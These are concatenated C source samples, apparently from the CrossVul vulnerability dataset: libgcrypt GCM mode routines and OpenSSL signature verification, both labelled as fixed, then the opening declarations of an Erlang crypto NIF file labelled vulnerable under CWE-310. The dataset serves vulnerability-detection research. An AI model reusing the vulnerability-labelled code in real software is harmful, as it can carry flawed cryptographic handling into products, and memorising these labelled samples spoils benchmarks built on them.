gcry_err_code_t err;
if (c->spec->blocksize != GCRY_GCM_BLOCK_LEN)
return GPG_ERR_CIPHER_ALGO;
if (outbuflen < inbuflen)
return GPG_ERR_BUFFER_TOO_SHORT;
if (c->u_mode.gcm.datalen_over_limits)
return GPG_ERR_INV_LENGTH;
if (c->marks.tag
|| c->u_mode.gcm.ghash_data_finalized
|| !c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
if (!c->marks.iv)
_gcry_cipher_gcm_setiv (c, zerobuf, GCRY_GCM_BLOCK_LEN);
if (c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode)
return GPG_ERR_INV_STATE;
if (!c->u_mode.gcm.ghash_aad_finalized)
{
/* Start of encryption marks end of AAD stream. */
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, NULL, 0, 1);
c->u_mode.gcm.ghash_aad_finalized = 1;
}
gcm_bytecounter_add(c->u_mode.gcm.datalen, inbuflen);
if (!gcm_check_datalen(c->u_mode.gcm.datalen))
{
c->u_mode.gcm.datalen_over_limits = 1;
return GPG_ERR_INV_LENGTH;
}
while (inbuflen)
{
size_t currlen = inbuflen;
/* Since checksumming is done after encryption, process input in 24KiB
* chunks to keep data loaded in L1 cache for checksumming. */
if (currlen > 24 * 1024)
currlen = 24 * 1024;
err = gcm_ctr_encrypt(c, outbuf, outbuflen, inbuf, currlen);
if (err != 0)
return err;
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, outbuf, currlen, 0);
outbuf += currlen;
inbuf += currlen;
outbuflen -= currlen;
inbuflen -= currlen;
}
return 0;
}
gcry_err_code_t
_gcry_cipher_gcm_decrypt (gcry_cipher_hd_t c,
byte *outbuf, size_t outbuflen,
const byte *inbuf, size_t inbuflen)
{
static const unsigned char zerobuf[MAX_BLOCKSIZE];
gcry_err_code_t err;
if (c->spec->blocksize != GCRY_GCM_BLOCK_LEN)
return GPG_ERR_CIPHER_ALGO;
if (outbuflen < inbuflen)
return GPG_ERR_BUFFER_TOO_SHORT;
if (c->u_mode.gcm.datalen_over_limits)
return GPG_ERR_INV_LENGTH;
if (c->marks.tag
|| c->u_mode.gcm.ghash_data_finalized
|| !c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
if (!c->marks.iv)
_gcry_cipher_gcm_setiv (c, zerobuf, GCRY_GCM_BLOCK_LEN);
if (!c->u_mode.gcm.ghash_aad_finalized)
{
/* Start of decryption marks end of AAD stream. */
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, NULL, 0, 1);
c->u_mode.gcm.ghash_aad_finalized = 1;
}
gcm_bytecounter_add(c->u_mode.gcm.datalen, inbuflen);
if (!gcm_check_datalen(c->u_mode.gcm.datalen))
{
c->u_mode.gcm.datalen_over_limits = 1;
return GPG_ERR_INV_LENGTH;
}
while (inbuflen)
{
size_t currlen = inbuflen;
/* Since checksumming is done before decryption, process input in
* 24KiB chunks to keep data loaded in L1 cache for decryption. */
if (currlen > 24 * 1024)
currlen = 24 * 1024;
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, inbuf, currlen, 0);
err = gcm_ctr_encrypt(c, outbuf, outbuflen, inbuf, currlen);
if (err)
return err;
outbuf += currlen;
inbuf += currlen;
outbuflen -= currlen;
inbuflen -= currlen;
}
return 0;
}
gcry_err_code_t
_gcry_cipher_gcm_authenticate (gcry_cipher_hd_t c,
const byte * aadbuf, size_t aadbuflen)
{
static const unsigned char zerobuf[MAX_BLOCKSIZE];
if (c->spec->blocksize != GCRY_GCM_BLOCK_LEN)
return GPG_ERR_CIPHER_ALGO;
if (c->u_mode.gcm.datalen_over_limits)
return GPG_ERR_INV_LENGTH;
if (c->marks.tag
|| c->u_mode.gcm.ghash_aad_finalized
|| c->u_mode.gcm.ghash_data_finalized
|| !c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
if (!c->marks.iv)
_gcry_cipher_gcm_setiv (c, zerobuf, GCRY_GCM_BLOCK_LEN);
gcm_bytecounter_add(c->u_mode.gcm.aadlen, aadbuflen);
if (!gcm_check_aadlen_or_ivlen(c->u_mode.gcm.aadlen))
{
c->u_mode.gcm.datalen_over_limits = 1;
return GPG_ERR_INV_LENGTH;
}
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, aadbuf, aadbuflen, 0);
return 0;
}
void
_gcry_cipher_gcm_setkey (gcry_cipher_hd_t c)
{
memset (c->u_mode.gcm.u_ghash_key.key, 0, GCRY_GCM_BLOCK_LEN);
c->spec->encrypt (&c->context.c, c->u_mode.gcm.u_ghash_key.key,
c->u_mode.gcm.u_ghash_key.key);
setupM (c);
}
static gcry_err_code_t
_gcry_cipher_gcm_initiv (gcry_cipher_hd_t c, const byte *iv, size_t ivlen)
{
memset (c->u_mode.gcm.aadlen, 0, sizeof(c->u_mode.gcm.aadlen));
memset (c->u_mode.gcm.datalen, 0, sizeof(c->u_mode.gcm.datalen));
memset (c->u_mode.gcm.u_tag.tag, 0, GCRY_GCM_BLOCK_LEN);
c->u_mode.gcm.datalen_over_limits = 0;
c->u_mode.gcm.ghash_data_finalized = 0;
c->u_mode.gcm.ghash_aad_finalized = 0;
if (ivlen == 0)
return GPG_ERR_INV_LENGTH;
if (ivlen != GCRY_GCM_BLOCK_LEN - 4)
{
u32 iv_bytes[2] = {0, 0};
u32 bitlengths[2][2];
if (!c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
memset(c->u_ctr.ctr, 0, GCRY_GCM_BLOCK_LEN);
gcm_bytecounter_add(iv_bytes, ivlen);
if (!gcm_check_aadlen_or_ivlen(iv_bytes))
{
c->u_mode.gcm.datalen_over_limits = 1;
return GPG_ERR_INV_LENGTH;
}
do_ghash_buf(c, c->u_ctr.ctr, iv, ivlen, 1);
/* iv length, 64-bit */
bitlengths[1][1] = be_bswap32(iv_bytes[0] << 3);
bitlengths[1][0] = be_bswap32((iv_bytes[0] >> 29) |
(iv_bytes[1] << 3));
/* zeros, 64-bit */
bitlengths[0][1] = 0;
bitlengths[0][0] = 0;
do_ghash_buf(c, c->u_ctr.ctr, (byte*)bitlengths, GCRY_GCM_BLOCK_LEN, 1);
wipememory (iv_bytes, sizeof iv_bytes);
wipememory (bitlengths, sizeof bitlengths);
}
else
{
/* 96-bit IV is handled differently. */
memcpy (c->u_ctr.ctr, iv, ivlen);
c->u_ctr.ctr[12] = c->u_ctr.ctr[13] = c->u_ctr.ctr[14] = 0;
c->u_ctr.ctr[15] = 1;
}
c->spec->encrypt (&c->context.c, c->u_mode.gcm.tagiv, c->u_ctr.ctr);
gcm_add32_be128 (c->u_ctr.ctr, 1);
c->unused = 0;
c->marks.iv = 1;
c->marks.tag = 0;
return 0;
}
gcry_err_code_t
_gcry_cipher_gcm_setiv (gcry_cipher_hd_t c, const byte *iv, size_t ivlen)
{
c->marks.iv = 0;
c->marks.tag = 0;
c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode = 0;
if (fips_mode ())
{
/* Direct invocation of GCM setiv in FIPS mode disables encryption. */
c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode = 1;
}
return _gcry_cipher_gcm_initiv (c, iv, ivlen);
}
#if 0 && TODO
void
_gcry_cipher_gcm_geniv (gcry_cipher_hd_t c,
byte *ivout, size_t ivoutlen, const byte *nonce,
size_t noncelen)
{
/* nonce: user provided part (might be null) */
/* noncelen: check if proper length (if nonce not null) */
/* ivout: iv used to initialize gcm, output to user */
/* ivoutlen: check correct size */
byte iv[IVLEN];
if (!ivout)
return GPG_ERR_INV_ARG;
if (ivoutlen != IVLEN)
return GPG_ERR_INV_LENGTH;
if (nonce != NULL && !is_nonce_ok_len(noncelen))
return GPG_ERR_INV_ARG;
gcm_generate_iv(iv, nonce, noncelen);
c->marks.iv = 0;
c->marks.tag = 0;
c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode = 0;
_gcry_cipher_gcm_initiv (c, iv, IVLEN);
buf_cpy(ivout, iv, IVLEN);
wipememory(iv, sizeof(iv));
}
#endif
static int
is_tag_length_valid(size_t taglen)
{
switch (taglen)
{
/* Allowed tag lengths from NIST SP 800-38D. */
case 128 / 8: /* GCRY_GCM_BLOCK_LEN */
case 120 / 8:
case 112 / 8:
case 104 / 8:
case 96 / 8:
case 64 / 8:
case 32 / 8:
return 1;
default:
return 0;
}
}
static gcry_err_code_t
_gcry_cipher_gcm_tag (gcry_cipher_hd_t c,
byte * outbuf, size_t outbuflen, int check)
{
if (!(is_tag_length_valid (outbuflen) || outbuflen >= GCRY_GCM_BLOCK_LEN))
return GPG_ERR_INV_LENGTH;
if (c->u_mode.gcm.datalen_over_limits)
return GPG_ERR_INV_LENGTH;
if (!c->marks.tag)
{
u32 bitlengths[2][2];
if (!c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
/* aad length */
bitlengths[0][1] = be_bswap32(c->u_mode.gcm.aadlen[0] << 3);
bitlengths[0][0] = be_bswap32((c->u_mode.gcm.aadlen[0] >> 29) |
(c->u_mode.gcm.aadlen[1] << 3));
/* data length */
bitlengths[1][1] = be_bswap32(c->u_mode.gcm.datalen[0] << 3);
bitlengths[1][0] = be_bswap32((c->u_mode.gcm.datalen[0] >> 29) |
(c->u_mode.gcm.datalen[1] << 3));
/* Finalize data-stream. */
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, NULL, 0, 1);
c->u_mode.gcm.ghash_aad_finalized = 1;
c->u_mode.gcm.ghash_data_finalized = 1;
/* Add bitlengths to tag. */
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, (byte*)bitlengths,
GCRY_GCM_BLOCK_LEN, 1);
cipher_block_xor (c->u_mode.gcm.u_tag.tag, c->u_mode.gcm.tagiv,
c->u_mode.gcm.u_tag.tag, GCRY_GCM_BLOCK_LEN);
c->marks.tag = 1;
wipememory (bitlengths, sizeof (bitlengths));
wipememory (c->u_mode.gcm.macbuf, GCRY_GCM_BLOCK_LEN);
wipememory (c->u_mode.gcm.tagiv, GCRY_GCM_BLOCK_LEN);
wipememory (c->u_mode.gcm.aadlen, sizeof (c->u_mode.gcm.aadlen));
wipememory (c->u_mode.gcm.datalen, sizeof (c->u_mode.gcm.datalen));
}
if (!check)
{
if (outbuflen > GCRY_GCM_BLOCK_LEN)
outbuflen = GCRY_GCM_BLOCK_LEN;
/* NB: We already checked that OUTBUF is large enough to hold
* the result or has valid truncated length. */
memcpy (outbuf, c->u_mode.gcm.u_tag.tag, outbuflen);
}
else
{
/* OUTBUFLEN gives the length of the user supplied tag in OUTBUF
* and thus we need to compare its length first. */
if (!is_tag_length_valid (outbuflen)
|| !buf_eq_const (outbuf, c->u_mode.gcm.u_tag.tag, outbuflen))
return GPG_ERR_CHECKSUM;
}
return 0;
}
gcry_err_code_t
_gcry_cipher_gcm_get_tag (gcry_cipher_hd_t c, unsigned char *outtag,
size_t taglen)
{
/* Outputting authentication tag is part of encryption. */
if (c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode)
return GPG_ERR_INV_STATE;
return _gcry_cipher_gcm_tag (c, outtag, taglen, 0);
}
gcry_err_code_t
_gcry_cipher_gcm_check_tag (gcry_cipher_hd_t c, const unsigned char *intag,
size_t taglen)
{
return _gcry_cipher_gcm_tag (c, (unsigned char *) intag, taglen, 1);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_892_0 |
crossvul-cpp_data_good_2309_1 | /* crypto/asn1/a_verify.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <time.h>
#include "cryptlib.h"
#ifndef NO_SYS_TYPES_H
# include <sys/types.h>
#endif
#include <openssl/bn.h>
#include <openssl/x509.h>
#include <openssl/objects.h>
#include <openssl/buffer.h>
#include <openssl/evp.h>
#include "asn1_locl.h"
#ifndef NO_ASN1_OLD
int ASN1_verify(i2d_of_void *i2d, X509_ALGOR *a, ASN1_BIT_STRING *signature,
char *data, EVP_PKEY *pkey)
{
EVP_MD_CTX ctx;
const EVP_MD *type;
unsigned char *p,*buf_in=NULL;
int ret= -1,i,inl;
EVP_MD_CTX_init(&ctx);
i=OBJ_obj2nid(a->algorithm);
type=EVP_get_digestbyname(OBJ_nid2sn(i));
if (type == NULL)
{
ASN1err(ASN1_F_ASN1_VERIFY,ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
goto err;
}
if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7)
{
ASN1err(ASN1_F_ASN1_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
goto err;
}
inl=i2d(data,NULL);
buf_in=OPENSSL_malloc((unsigned int)inl);
if (buf_in == NULL)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_MALLOC_FAILURE);
goto err;
}
p=buf_in;
i2d(data,&p);
ret=
EVP_VerifyInit_ex(&ctx,type, NULL)
&& EVP_VerifyUpdate(&ctx,(unsigned char *)buf_in,inl);
OPENSSL_cleanse(buf_in,(unsigned int)inl);
OPENSSL_free(buf_in);
if (!ret)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_EVP_LIB);
goto err;
}
ret = -1;
if (EVP_VerifyFinal(&ctx,(unsigned char *)signature->data,
(unsigned int)signature->length,pkey) <= 0)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
/* we don't need to zero the 'ctx' because we just checked
* public information */
/* memset(&ctx,0,sizeof(ctx)); */
ret=1;
err:
EVP_MD_CTX_cleanup(&ctx);
return(ret);
}
#endif
int ASN1_item_verify(const ASN1_ITEM *it, X509_ALGOR *a,
ASN1_BIT_STRING *signature, void *asn, EVP_PKEY *pkey)
{
EVP_MD_CTX ctx;
unsigned char *buf_in=NULL;
int ret= -1,inl;
int mdnid, pknid;
if (!pkey)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ERR_R_PASSED_NULL_PARAMETER);
return -1;
}
if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7)
{
ASN1err(ASN1_F_ASN1_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
return -1;
}
EVP_MD_CTX_init(&ctx);
/* Convert signature OID into digest and public key OIDs */
if (!OBJ_find_sigid_algs(OBJ_obj2nid(a->algorithm), &mdnid, &pknid))
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
goto err;
}
if (mdnid == NID_undef)
{
if (!pkey->ameth || !pkey->ameth->item_verify)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
goto err;
}
ret = pkey->ameth->item_verify(&ctx, it, asn, a,
signature, pkey);
/* Return value of 2 means carry on, anything else means we
* exit straight away: either a fatal error of the underlying
* verification routine handles all verification.
*/
if (ret != 2)
goto err;
ret = -1;
}
else
{
const EVP_MD *type;
type=EVP_get_digestbynid(mdnid);
if (type == NULL)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
goto err;
}
/* Check public key OID matches public key type */
if (EVP_PKEY_type(pknid) != pkey->ameth->pkey_id)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_WRONG_PUBLIC_KEY_TYPE);
goto err;
}
if (!EVP_DigestVerifyInit(&ctx, NULL, type, NULL, pkey))
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
}
inl = ASN1_item_i2d(asn, &buf_in, it);
if (buf_in == NULL)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_MALLOC_FAILURE);
goto err;
}
ret = EVP_DigestVerifyUpdate(&ctx,buf_in,inl);
OPENSSL_cleanse(buf_in,(unsigned int)inl);
OPENSSL_free(buf_in);
if (!ret)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
goto err;
}
ret = -1;
if (EVP_DigestVerifyFinal(&ctx,signature->data,
(size_t)signature->length) <= 0)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
/* we don't need to zero the 'ctx' because we just checked
* public information */
/* memset(&ctx,0,sizeof(ctx)); */
ret=1;
err:
EVP_MD_CTX_cleanup(&ctx);
return(ret);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_2309_1 |
crossvul-cpp_data_bad_3428_0 | /*
* %CopyrightBegin%
*
* Copyright Ericsson AB 2010-2011. All Rights Reserved.
*
* The contents of this file are subject to the Erlang Public License,
* Version 1.1, (the "License"); you may not use this file except in
* compliance with the License. You should have received a copy of the
* Erlang Public License along with this software. If not, it can be
* retrieved online at http://www.erlang.org/.
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See
* the License for the specific language governing rights and limitations
* under the License.
*
* %CopyrightEnd%
*/
/*
* Purpose: Dynamically loadable NIF library for cryptography.
* Based on OpenSSL.
*/
#ifdef __WIN32__
#include <windows.h>
#endif
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include "erl_nif.h"
#define OPENSSL_THREAD_DEFINES
#include <openssl/opensslconf.h>
#include <openssl/crypto.h>
#include <openssl/des.h>
/* #include <openssl/idea.h> This is not supported on the openssl OTP requires */
#include <openssl/dsa.h>
#include <openssl/rsa.h>
#include <openssl/aes.h>
#include <openssl/md5.h>
#include <openssl/md4.h>
#include <openssl/sha.h>
#include <openssl/bn.h>
#include <openssl/objects.h>
#include <openssl/rc4.h>
#include <openssl/rc2.h>
#include <openssl/blowfish.h>
#include <openssl/rand.h>
#ifdef VALGRIND
# include <valgrind/memcheck.h>
/* libcrypto mixes supplied buffer contents into its entropy pool,
which makes valgrind complain about the use of uninitialized data.
We use this valgrind "request" to make sure that no such seemingly
undefined data is returned.
*/
# define ERL_VALGRIND_MAKE_MEM_DEFINED(ptr,size) \
VALGRIND_MAKE_MEM_DEFINED(ptr,size)
# define ERL_VALGRIND_ASSERT_MEM_DEFINED(Ptr,Size) \
do { \
int __erl_valgrind_mem_defined = VALGRIND_CHECK_MEM_IS_DEFINED((Ptr),(Size)); \
if (__erl_valgrind_mem_defined != 0) { \
fprintf(stderr,"\r\n####### VALGRIND_ASSSERT(%p,%ld) failed at %s:%d\r\n", \
(Ptr),(long)(Size), __FILE__, __LINE__); \
abort(); \
} \
} while (0)
#else
# define ERL_VALGRIND_MAKE_MEM_DEFINED(ptr,size)
# define ERL_VALGRIND_ASSERT_MEM_DEFINED(ptr,size)
#endif
#ifdef DEBUG
# define ASSERT(e) \
((void) ((e) ? 1 : (fprintf(stderr,"Assert '%s' failed at %s:%d\n",\
#e, __FILE__, __LINE__), abort(), 0)))
#else
# define ASSERT(e) ((void) 1)
#endif
#ifdef __GNUC__
# define INLINE __inline__
#elif defined(__WIN32__)
# define INLINE __forceinline
#else
# define INLINE
#endif
#define get_int32(s) ((((unsigned char*) (s))[0] << 24) | \
(((unsigned char*) (s))[1] << 16) | \
(((unsigned char*) (s))[2] << 8) | \
(((unsigned char*) (s))[3]))
#define put_int32(s,i) \
{ (s)[0] = (char)(((i) >> 24) & 0xff);\
(s)[1] = (char)(((i) >> 16) & 0xff);\
(s)[2] = (char)(((i) >> 8) & 0xff);\
(s)[3] = (char)((i) & 0xff);\
}
/* NIF interface declarations */
static int load(ErlNifEnv* env, void** priv_data, ERL_NIF_TERM load_info);
static int reload(ErlNifEnv* env, void** priv_data, ERL_NIF_TERM load_info);
static int upgrade(ErlNifEnv* env, void** priv_data, void** old_priv_data, ERL_NIF_TERM load_info);
static void unload(ErlNifEnv* env, void* priv_data);
/* The NIFs: */
static ERL_NIF_TERM info_lib(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md4(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md4_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md4_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md4_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5_mac_n(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha_mac_n(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM des_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM des_ecb_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM des_ede3_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM aes_cfb_128_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM aes_ctr_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rand_bytes_1(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rand_bytes_3(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rand_uniform_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM mod_exp_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dss_verify(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rsa_verify(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM aes_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM exor(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rc4_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rc4_set_key(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rc4_encrypt_with_state(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rc2_40_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rsa_sign_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dss_sign_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rsa_public_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rsa_private_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dh_generate_parameters_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dh_check(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dh_generate_key_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dh_compute_key_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM bf_cfb64_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM bf_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM bf_ecb_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM blowfish_ofb64_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
/* openssl callbacks */
#ifdef OPENSSL_THREADS
static void locking_function(int mode, int n, const char *file, int line);
static unsigned long id_function(void);
static struct CRYPTO_dynlock_value* dyn_create_function(const char *file,
int line);
static void dyn_lock_function(int mode, struct CRYPTO_dynlock_value* ptr,
const char *file, int line);
static void dyn_destroy_function(struct CRYPTO_dynlock_value *ptr,
const char *file, int line);
#endif /* OPENSSL_THREADS */
/* helpers */
static void hmac_md5(unsigned char *key, int klen,
unsigned char *dbuf, int dlen,
unsigned char *hmacbuf);
static void hmac_sha1(unsigned char *key, int klen,
unsigned char *dbuf, int dlen,
unsigned char *hmacbuf);
static int library_refc = 0; /* number of users of this dynamic library */
static ErlNifFunc nif_funcs[] = {
{"info_lib", 0, info_lib},
{"md5", 1, md5},
{"md5_init", 0, md5_init},
{"md5_update", 2, md5_update},
{"md5_final", 1, md5_final},
{"sha", 1, sha},
{"sha_init", 0, sha_init},
{"sha_update", 2, sha_update},
{"sha_final", 1, sha_final},
{"md4", 1, md4},
{"md4_init", 0, md4_init},
{"md4_update", 2, md4_update},
{"md4_final", 1, md4_final},
{"md5_mac_n", 3, md5_mac_n},
{"sha_mac_n", 3, sha_mac_n},
{"des_cbc_crypt", 4, des_cbc_crypt},
{"des_ecb_crypt", 3, des_ecb_crypt},
{"des_ede3_cbc_crypt", 6, des_ede3_cbc_crypt},
{"aes_cfb_128_crypt", 4, aes_cfb_128_crypt},
{"aes_ctr_encrypt", 3, aes_ctr_encrypt},
{"aes_ctr_decrypt", 3, aes_ctr_encrypt},
{"rand_bytes", 1, rand_bytes_1},
{"rand_bytes", 3, rand_bytes_3},
{"rand_uniform_nif", 2, rand_uniform_nif},
{"mod_exp_nif", 3, mod_exp_nif},
{"dss_verify", 4, dss_verify},
{"rsa_verify", 4, rsa_verify},
{"aes_cbc_crypt", 4, aes_cbc_crypt},
{"exor", 2, exor},
{"rc4_encrypt", 2, rc4_encrypt},
{"rc4_set_key", 1, rc4_set_key},
{"rc4_encrypt_with_state", 2, rc4_encrypt_with_state},
{"rc2_40_cbc_crypt", 4, rc2_40_cbc_crypt},
{"rsa_sign_nif", 3, rsa_sign_nif},
{"dss_sign_nif", 3, dss_sign_nif},
{"rsa_public_crypt", 4, rsa_public_crypt},
{"rsa_private_crypt", 4, rsa_private_crypt},
{"dh_generate_parameters_nif", 2, dh_generate_parameters_nif},
{"dh_check", 1, dh_check},
{"dh_generate_key_nif", 2, dh_generate_key_nif},
{"dh_compute_key_nif", 3, dh_compute_key_nif},
{"bf_cfb64_crypt", 4, bf_cfb64_crypt},
{"bf_cbc_crypt", 4, bf_cbc_crypt},
{"bf_ecb_crypt", 3, bf_ecb_crypt},
{"blowfish_ofb64_encrypt", 3, blowfish_ofb64_encrypt}
};
